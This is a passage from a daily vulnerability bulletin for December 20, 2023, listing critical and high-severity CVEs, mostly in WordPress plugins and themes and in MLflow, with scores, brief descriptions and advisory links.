Latest vulnerabilities [Wednesday, December 20, 2023]

Latest vulnerabilities [Wednesday, December 20, 2023]
{{titre}}

Last update performed on 12/20/2023 at 11:57:05 PM

(30) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : huntr.dev

Vulnerability ID : CVE-2023-6975

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information.

CVE ID : CVE-2023-6975
Source : security@huntr.dev
CVSS Score : 10.0

References :
https://github.com/mlflow/mlflow/commit/b9ab9ed77e1deda9697fe472fb1079fd428149ee | source : security@huntr.dev
https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85 | source : security@huntr.dev

Vulnerability : CWE-29


Vulnerability ID : CVE-2023-6977

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
This vulnerability enables malicious users to read sensitive files on the server.

CVE ID : CVE-2023-6977
Source : security@huntr.dev
CVSS Score : 10.0

References :
https://github.com/mlflow/mlflow/commit/4bd7f27c810ba7487d53ed5ef1038fca0f8dc28c | source : security@huntr.dev
https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf | source : security@huntr.dev

Vulnerability : CWE-29


Vulnerability ID : CVE-2023-7018

First published on : 20-12-2023 17:15:08
Last modified on : 20-12-2023 19:52:41

Description :
Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36.

CVE ID : CVE-2023-7018
Source : security@huntr.dev
CVSS Score : 9.6

References :
https://github.com/huggingface/transformers/commit/1d63b0ec361e7a38f1339385e8a5a855085532ce | source : security@huntr.dev
https://huntr.com/bounties/e1a3e548-e53a-48df-b708-9ee62140963c | source : security@huntr.dev

Vulnerability : CWE-502


Source : patchstack.com

Vulnerability ID : CVE-2023-49772

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love.This issue affects Genesis Simple Love: from n/a through 2.0.

CVE ID : CVE-2023-49772
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/genesis-simple-love/wordpress-genesis-simple-love-plugin-2-0-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-49773

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes.This issue affects BCorp Shortcodes: from n/a through 0.23.

CVE ID : CVE-2023-49773
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/bcorp-shortcodes/wordpress-bcorp-shortcodes-plugin-0-23-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-29384

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin โ€“ JobWP.This issue affects WordPress Job Board and Recruitment Plugin โ€“ JobWP: from n/a through 2.0.

CVE ID : CVE-2023-29384
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/jobwp/wordpress-job-board-and-recruitment-plugin-jobwp-plugin-2-0-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-25970

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop โ€“ Global Dropshipping.This issue affects Zendrop โ€“ Global Dropshipping: from n/a through 1.0.0.

CVE ID : CVE-2023-25970
Source : audit@patchstack.com
CVSS Score : 10.0

References :
https://patchstack.com/database/vulnerability/zendrop-dropshipping-and-fulfillment/wordpress-zendrop-global-dropshipping-plugin-1-0-0-arbitrary-file-upload?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-31215

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon.This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2.

CVE ID : CVE-2023-31215
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/wp-amazon-shop/wordpress-dropshipping-affiliation-with-amazon-plugin-2-1-2-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-31231

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates).This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65.

CVE ID : CVE-2023-31231
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/unlimited-elements-for-elementor/wordpress-unlimited-elements-for-elementor-plugin-1-5-65-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-33318

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo.This issue affects AutomateWoo: from n/a through 4.9.40.

CVE ID : CVE-2023-33318
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/woocommerce-follow-up-emails/wordpress-woocommerce-follow-up-emails-plugin-4-9-40-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-34007

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.8.3.

CVE ID : CVE-2023-34007
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-8-3-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-34385

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus.This issue affects Export Import Menus: from n/a through 1.8.0.

CVE ID : CVE-2023-34385
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/export-import-menus/wordpress-export-import-menus-plugin-1-8-0-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-46149

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra.This issue affects Themify Ultra: from n/a through 7.3.5.

CVE ID : CVE-2023-46149
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/themify-ultra/wordpress-themify-ultra-theme-7-3-3-authenticated-unrestricted-zip-extraction-lead-to-rce-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-23970

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa.This issue affects Corsa: from n/a through 1.5.

CVE ID : CVE-2023-23970
Source : audit@patchstack.com
CVSS Score : 9.9

References :
https://patchstack.com/database/vulnerability/corsa/wordpress-corsa-theme-1-5-arbitrary-file-upload?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-32590

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:25

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daniel Sรถderstrรถm / Sidney van de Stouwe Subscribe to Category.This issue affects Subscribe to Category: from n/a through 2.7.4.

CVE ID : CVE-2023-32590
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/subscribe-to-category/wordpress-subscribe-to-category-plugin-2-7-4-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-40010

First published on : 20-12-2023 15:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in realmag777 HUSKY โ€“ Products Filter for WooCommerce Professional.This issue affects HUSKY โ€“ Products Filter for WooCommerce Professional: from n/a through 1.3.4.2.

CVE ID : CVE-2023-40010
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/woocommerce-products-filter/wordpress-husky-plugin-1-3-4-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49776

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hakan Demiray Sayfa Sayac.This issue affects Sayfa Sayac: from n/a through 2.6.

CVE ID : CVE-2023-49776
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/sayfa-sayac/wordpress-sayfa-sayac-plugin-2-6-unauthenticated-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49752

First published on : 20-12-2023 18:15:13
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spoon themes Adifier - Classified Ads WordPress Theme.This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.

CVE ID : CVE-2023-49752
Source : audit@patchstack.com
CVSS Score : 9.3

References :
https://patchstack.com/database/vulnerability/adifier/wordpress-adifier-classified-ads-wordpress-theme-theme-3-9-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-28170

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import.This issue affects Theme Demo Import: from n/a through 1.1.1.

CVE ID : CVE-2023-28170
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/theme-demo-import/wordpress-theme-demo-import-plugin-1-1-1-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-29102

First published on : 20-12-2023 19:15:08
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import.This issue affects Olive One Click Demo Import: from n/a through 1.1.1.

CVE ID : CVE-2023-29102
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/olive-one-click-demo-import/wordpress-olive-one-click-demo-import-plugin-1-0-9-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-40204

First published on : 20-12-2023 19:15:09
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders โ€“ Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager.This issue affects Folders โ€“ Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2.

CVE ID : CVE-2023-40204
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/folders/wordpress-folders-plugin-2-9-2-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-49814

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock.This issue affects Symbiostock: from n/a through 6.0.0.

CVE ID : CVE-2023-49814
Source : audit@patchstack.com
CVSS Score : 9.1

References :
https://patchstack.com/database/vulnerability/symbiostock/wordpress-symbiostock-lite-plugin-6-0-0-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-45603

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts โ€“ Enable Users to Submit Posts from the Front End.This issue affects User Submitted Posts โ€“ Enable Users to Submit Posts from the Front End: from n/a through 20230902.

CVE ID : CVE-2023-45603
Source : audit@patchstack.com
CVSS Score : 9.0

References :
https://patchstack.com/database/vulnerability/user-submitted-posts/wordpress-user-submitted-posts-plugin-20230902-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Source : fluidattacks.com

Vulnerability ID : CVE-2023-5007

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'id' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-5007
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/kissin/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-5010

First published on : 20-12-2023 16:15:10
Last modified on : 20-12-2023 16:47:19

Description :
Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursecode' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-5010
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/kissin/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-5011

First published on : 20-12-2023 16:15:10
Last modified on : 20-12-2023 16:47:19

Description :
Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'coursename' parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-5011
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/kissin/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48433

First published on : 20-12-2023 21:15:07
Last modified on : 20-12-2023 21:15:07

Description :
Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-48433
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/ma/ | source : help@fluidattacks.com
https://projectworlds.in/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48434

First published on : 20-12-2023 21:15:07
Last modified on : 20-12-2023 21:15:07

Description :
Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database.

CVE ID : CVE-2023-48434
Source : help@fluidattacks.com
CVSS Score : 9.8

References :
https://fluidattacks.com/advisories/ma/ | source : help@fluidattacks.com
https://projectworlds.in/ | source : help@fluidattacks.com

Vulnerability : CWE-89


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-50707

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device.

CVE ID : CVE-2023-50707
Source : ics-cert@hq.dhs.gov
CVSS Score : 9.6

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-02 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-400


Source : incibe.es

Vulnerability ID : CVE-2023-6768

First published on : 20-12-2023 10:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Authentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the "lp_admin.php?adminstep=" parameter.

CVE ID : CVE-2023-6768
Source : cve-coordination@incibe.es
CVSS Score : 9.4

References :
https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amazing-little-poll | source : cve-coordination@incibe.es

Vulnerability : CWE-287


(35) HIGH VULNERABILITIES [7.0, 8.9]

Source : huntr.dev

Vulnerability ID : CVE-2023-6976

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
This vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process.

CVE ID : CVE-2023-6976
Source : security@huntr.dev
CVSS Score : 8.8

References :
https://github.com/mlflow/mlflow/commit/5044878da0c1851ccfdd5c0a867157ed9a502fbc | source : security@huntr.dev
https://huntr.com/bounties/2408a52b-f05b-4cac-9765-4f74bac3f20f | source : security@huntr.dev

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6974

First published on : 20-12-2023 06:15:45
Last modified on : 20-12-2023 13:50:15

Description :
A malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine.

CVE ID : CVE-2023-6974
Source : security@huntr.dev
CVSS Score : 8.6

References :
https://github.com/mlflow/mlflow/commit/8174250f83352a04c2d42079f414759060458555 | source : security@huntr.dev
https://huntr.com/bounties/438b0524-da0e-4d08-976a-6f270c688393 | source : security@huntr.dev

Vulnerability : CWE-918


Source : patchstack.com

Vulnerability ID : CVE-2023-47852

First published on : 20-12-2023 15:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Link Whisper Link Whisper Free.This issue affects Link Whisper Free: from n/a through 0.6.5.

CVE ID : CVE-2023-47852
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/link-whisper/wordpress-link-whisper-free-plugin-0-6-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-33209

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CrawlSpider SEO Change Monitor โ€“ Track Website Changes.This issue affects SEO Change Monitor โ€“ Track Website Changes: from n/a through 1.2.

CVE ID : CVE-2023-33209
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/seo-change-monitor/wordpress-seo-change-monitor-plugin-1-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-33330

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo.This issue affects AutomateWoo: from n/a through 4.9.50.

CVE ID : CVE-2023-33330
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/woocommerce-follow-up-emails/wordpress-woocommerce-follow-up-emails-plugin-4-9-50-follow-up-emails-manager-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49825

First published on : 20-12-2023 16:15:09
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenciDesign Soledad โ€“ Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme.This issue affects Soledad โ€“ Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.

CVE ID : CVE-2023-49825
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-1-contributor-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-30495

First published on : 20-12-2023 17:15:07
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themefic Ultimate Addons for Contact Form 7.This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23.

CVE ID : CVE-2023-30495
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/ultimate-addons-for-contact-form-7/wordpress-ultimate-addons-for-contact-form-7-plugin-3-1-23-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-30750

First published on : 20-12-2023 17:15:07
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress.This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10.

CVE ID : CVE-2023-30750
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/cm-pop-up-banners/wordpress-cm-pop-up-banners-for-wordpress-plugin-1-5-10-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-29096

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft โ€“ Messages Database Plugin For WordPress.This issue affects Contact Form to DB by BestWebSoft โ€“ Messages Database Plugin For WordPress: from n/a through 1.7.0.

CVE ID : CVE-2023-29096
Source : audit@patchstack.com
CVSS Score : 8.5

References :
https://patchstack.com/database/vulnerability/contact-form-to-db/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-47784

First published on : 20-12-2023 19:15:10
Last modified on : 20-12-2023 19:52:34

Description :
Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution.This issue affects Slider Revolution: from n/a through 6.6.15.

CVE ID : CVE-2023-47784
Source : audit@patchstack.com
CVSS Score : 8.4

References :
https://patchstack.com/database/vulnerability/revslider/wordpress-slider-revolution-plugin-6-6-15-author-arbitrary-file-upload-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-40555

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme.This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5.

CVE ID : CVE-2023-40555
Source : audit@patchstack.com
CVSS Score : 8.3

References :
https://patchstack.com/database/vulnerability/flatsome/wordpress-flatsome-theme-3-17-5-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-28782

First published on : 20-12-2023 15:15:07
Last modified on : 20-12-2023 16:47:25

Description :
Deserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms.This issue affects Gravity Forms: from n/a through 2.7.3.

CVE ID : CVE-2023-28782
Source : audit@patchstack.com
CVSS Score : 8.3

References :
https://patchstack.com/database/vulnerability/gravityforms/wordpress-gravity-forms-plugin-2-7-3-unauthenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-37871

First published on : 20-12-2023 14:15:19
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless.This issue affects GoCardless: from n/a through 2.5.6.

CVE ID : CVE-2023-37871
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/woocommerce-gateway-gocardless/wordpress-woocommerce-gocardless-gateway-plugin-2-5-6-unauthenticated-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-29432

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme.This issue affects Houzez - Real Estate WordPress Theme: from n/a before 2.8.3.

CVE ID : CVE-2023-29432
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/houzez/wordpress-houzez-theme-2-8-3-unauth-sql-injection-sqli-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-35876

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:25

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square.This issue affects WooCommerce Square: from n/a through 3.8.1.

CVE ID : CVE-2023-35876
Source : audit@patchstack.com
CVSS Score : 8.1

References :
https://patchstack.com/database/vulnerability/woocommerce-square/wordpress-woocommerce-square-plugin-3-8-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-38519

First published on : 20-12-2023 14:15:19
Last modified on : 20-12-2023 14:33:33

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MainWP MainWP Dashboard โ€“ WordPress Manager for Multiple Websites Maintenance.This issue affects MainWP Dashboard โ€“ WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3.

CVE ID : CVE-2023-38519
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/mainwp/wordpress-mainwp-plugin-4-4-3-3-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-47236

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress.This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8.

CVE ID : CVE-2023-47236
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/ipages-flipbook/wordpress-ipages-flipbook-for-wordpress-plugin-1-4-8-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32743

First published on : 20-12-2023 16:15:07
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce AutomateWoo.This issue affects AutomateWoo: from n/a through 5.7.1.

CVE ID : CVE-2023-32743
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/automatewoo/wordpress-automatewoo-plugin-5-7-1-shop-manager-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-35915

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Automattic WooPayments โ€“ Fully Integrated Solution Built and Supported by Woo.This issue affects WooPayments โ€“ Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.

CVE ID : CVE-2023-35915
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/woocommerce-payments/wordpress-woocommerce-payments-plugin-5-9-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-30872

First published on : 20-12-2023 17:15:08
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BannerSky BSK Forms Blacklist.This issue affects BSK Forms Blacklist: from n/a through 3.6.2.

CVE ID : CVE-2023-30872
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/bsk-gravityforms-blacklist/wordpress-bsk-forms-blacklist-plugin-3-6-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49161

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Guelben Bravo Translate.This issue affects Bravo Translate: from n/a through 1.2.

CVE ID : CVE-2023-49161
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/bravo-translate/wordpress-bravo-translate-plugin-1-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49166

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:34

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magic Logix MSync.This issue affects MSync: from n/a through 1.0.0.

CVE ID : CVE-2023-49166
Source : audit@patchstack.com
CVSS Score : 7.6

References :
https://patchstack.com/database/vulnerability/msync/wordpress-msync-plugin-1-0-0-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-35914

